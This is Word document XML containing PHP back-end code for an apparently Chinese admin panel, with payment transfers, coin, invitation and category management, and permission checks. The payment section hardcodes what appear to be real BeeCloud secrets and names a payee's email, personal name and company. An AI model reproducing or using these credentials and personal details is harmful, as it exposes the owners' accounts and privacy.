    <w:p w14:paraId="27756D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5EFA57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44F61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2EE5F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 'de11b391-f625-4dba-b4ce-db31e8414168';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465795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$appsecret = 'e595cedd-b31b-4057-bb9a-4c587fbedcec';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902A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$mastersecret = 'b6441d1a-ec0b-4d56-84fa-6b27b03dfbc7';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708E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$testsecret = '69dfb715-e7d6-49df-a8de-3ed78230f7e6';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB60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\beecloud\rest\api::registerApp($appid, $appsecret, $mastersecret, $testsecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FEA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'timestamp' =&gt; time() * 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FE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 =&gt; 'ALI',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC09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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝企业打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B73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'transfer_no' =&gt; "a_" . time(),    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BEC5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'batch_no'  =&gt;  'w_'.time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9CFD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'total_fee' =&gt; 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C506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'channel_user_id' =&gt; 'mohuanshji85@163.com',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598DF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'channel_user_name' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>许飞翔</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0BA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'account_name' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定州得宝网络科技有限公司</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C7B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'transfer_data'=&gt;[],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3172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0E55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\beecloud\rest\api::transfers($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E961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dump($result);exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443B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($result-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345989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6A0A17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2185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if(isset($result-&gt;url)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8A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header("Location:$result-&gt;url");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA15B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4774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(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5720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$e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7569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26E0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51FC9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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389E3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E28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C228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3EA5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60720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12BF46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EF588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Coin extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C831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BFB8C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updateBasicDataLocally()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C563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7C5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A0C79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$dir = dirname(dirname(dirname(dirname(__FILE__))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8CBF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$file_path = $dir . '/' . 'config/coin_basicdata/currency_list_merge.json';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319446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$json_string = file_get_contents($file_path); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F6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$currencies = json_decode($json_string, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE41D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foreach($currencies as $currency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63460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B51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$coin=Db::name('coin')-&gt;where('currency', $currency['currency'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B4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if($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7A4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$db_ret=Db::name('coin')-&gt;where('currency',$currency['currency'])-&gt;update($currency);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B6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4D53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$db_ret=Db::name('coin')-&gt;insert($currency);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC3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553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FDC7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['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更新完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD2A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0A29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5BA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FEEE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04D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23D2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5D5E05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7B15A5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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF728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$map['currency']  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE31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3576A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3BAE7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403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$data=Db::name('coin')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E6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$page=$data-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF23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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2A0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244A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00C3C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750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54C24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C36D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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7995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9702C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$validate=validate('Coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F726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if(!$validate-&gt;check($post))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A7C5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["err"=&gt;$validate-&gt;getError()]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79471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382FEF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2207C1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$titledb=Db::name('coin')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E2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358346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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FC9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63A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$db=Db::name('coin')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06862D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49E2D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234D1F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0D06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350F6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A9054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7E00DB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$db=Db::name('coin')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E66A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F8800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1F8939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E81E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091AE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B7AE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B63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574B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ABFBD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$name=Db::name('coin')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E72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7EDF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7F6E90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9A7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4E36F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48B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DFD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C600F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3B0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09F6D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49A0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6A202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03617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563AD9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2AB124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68C085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Yaoqing extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC983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9C1C9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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A48D7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$config=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785B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$config['money_news_time']=$config['money_news_time']/1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009189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$this-&gt;assign('cfg',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A487A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989F9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D411A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if($post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A238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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B661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57AF7D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$data['money_news_time']=$data['money_news_time']*1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028025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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09323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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D42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74493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385373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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476E1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file_put_contents(APP_PATH.'extra/yaoqing.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB82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267373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62178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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08FE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20B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AF50F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765DA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108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9074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3C887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09F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BC30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A1C5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records(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F9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$get=input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507047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7E739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if(!empty($get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CB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$where['uid']=$get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B033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23C0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$data=Db::name('yaoqing_records')-&gt;order('time desc')-&gt;where($where)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A27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2800F1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473B52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49E7E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FEFC5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6F8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so(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB28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$get=input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B7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6A9DA5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if(!empty($get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC90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$where['s1']=$get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74944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68AB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$where['tudi_num']=['&lt;&gt;',0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB09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FEF4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$data=Db::name('yaoqing')-&gt;where($where)-&gt;order('tudi_num desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3F6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3741A4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6C626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16A90B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E254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5551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renwu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F190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$data=Db::name('renwu')-&gt;order('desc desc,id,asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F348B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2DD20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D256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2246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3EB1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DA08B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530EA0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733555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602753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Category extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC04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D6BA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574826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$category=Db::name('category')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06049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$category=get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5C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$this-&gt;assign('data',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A697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A001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D9D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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70611B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8785E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if(input('id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD72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$data=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05469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7F5ED8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$info=Db::name('category')-&gt;where('id',input('id'))-&gt;update($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497A7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if($info){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC68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$data=json(array("ret"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",'url'=&gt;url('index')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06300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B53A0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$data=json(array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D2A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6149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0506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$data=json(array("err"=&gt;$validate-&gt;getError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18524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7306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5D33E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validate('Category');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415C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$data=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D478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if($validate-&gt;check($data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49293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$info=Db::name('category')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D158F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if($info){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37A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$data=json(array("ret"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",'url'=&gt;url('add')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CCF6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0A24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$data=json(array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EDE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1663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0EEDA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$data=json(array("err"=&gt;$validate-&gt;getError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631DF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2648D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8E83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45DFA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$category=Db::name('category')-&gt;field('id,tid,title')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AA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$category=get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A550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$this-&gt;assign('category',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC90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if(input('id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BA1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$name=Db::name('category')-&gt;where('id',input('id'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCF4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$categoryID=$name['tid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A62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43C38A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F9F4A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5D0C40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02D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A222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A55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23C240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E39BF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$id=input('post.id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CA6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if(!$id){return json(array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1")); exit();}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210865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$category=DB::name('category')-&gt;where('tid',$id)-&gt;field('id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AE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if($category){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA6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$data=array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先删除下级菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F9B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544BC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$del=Db::name('category')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902EB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if($del){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500707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$data=array("ret"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A96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70F8B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$data=array("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B04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BE1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B18B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E36EC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$data=array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11B4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4A6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4843CE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5F4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1F669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D9A5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$type=input('hide'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB0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41A83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if($type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C6D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$type='hideleft';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28057B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56BCF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$type='hideright';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF76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732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$db=DB::name('category')-&gt;where('id',$id)-&gt;field($type)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73C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if($db[$type]==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3B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$hide=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F653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5E11C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$hide=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780FD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E618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$db=DB::name('category')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D574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9910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$this-&gt;redirect("category/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4A2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BCA84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设置失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353B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9E9C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E625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4BB5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36E57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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DC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4570D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think\Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14776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43194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Common extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C276A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F357C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_initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F006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if(!Session::has('admin','ffxiangAdmin')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039F2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$this-&gt;redirect("Login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A87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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100C7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$adminId=Session::get('admin','ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1A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$adminId=db('admin')-&gt;where(['id'=&gt;$adminId['id'],'name'=&gt;$adminId['name'],'type'=&gt;$adminId['type'],'hide'=&gt;$adminId['hide'],'password'=&gt;$adminId['password']])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03670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if(!$adminId){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E365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session(null, 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAADF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$this-&gt;redirect("Login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D7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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7EC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if($adminId['id']!=1 &amp;&amp; $adminId['type']!=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02904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$controller=strtolower(request()-&gt;controller());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CDD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$action=strtolower(request()-&gt;action());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270AE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$if=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3A0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if($controller=='index' &amp;&amp; $action=='index'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C5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$if=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A048E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3BCEA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if($controller=='index' &amp;&amp; $action=='out'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01014C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$if=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF8C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65F414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if($controller=='index' &amp;&amp; $action=='main'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC8C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$if=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F738C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6EF1B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if($if==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E261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$adminTypeData=db('admin_type')-&gt;where('id',$adminId['type'])-&gt;cache(_cache('db'))-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC23A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$adminCategoryId=db('category')-&gt;where(['controller'=&gt;$controller,'function'=&gt;$action])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A38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$permissionSucceeded=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2955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if($adminCategoryId &amp;&amp; $adminTypeData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED47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$a=json_decode($adminTypeData,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D64F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foreach ($a as $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7AB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if($adminCategoryId==$v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413158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$permissionSucceeded=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CB3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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131BF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1C7B8D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4AF3F6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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C511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echo  "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>adminType</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段参数不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17AB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302183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if($permissionSucceeded==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C86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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无权访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D634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7BBAB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F14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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF62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0989B6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03243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1EFCA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D762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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18643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58D411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5AAFEF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2A955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Admin extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5A2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1F522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r w:rsidRPr="008320C6">
        <w:rPr>
